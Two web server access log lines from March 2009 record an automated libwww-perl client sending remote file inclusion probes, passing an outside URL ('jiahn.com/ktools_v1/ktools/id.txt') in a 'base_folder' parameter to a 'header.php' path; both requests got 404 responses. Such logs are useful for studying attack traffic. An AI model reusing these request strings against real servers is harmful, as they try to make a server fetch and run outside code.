67.205.96.234 - - [13/Mar/2009:06:06:11 -0500] "GET /logs/access_log.1211932800//Neos_Chronos/header.php?base_folder=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.823"
67.205.96.234 - - [13/Mar/2009:06:06:11 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.823"
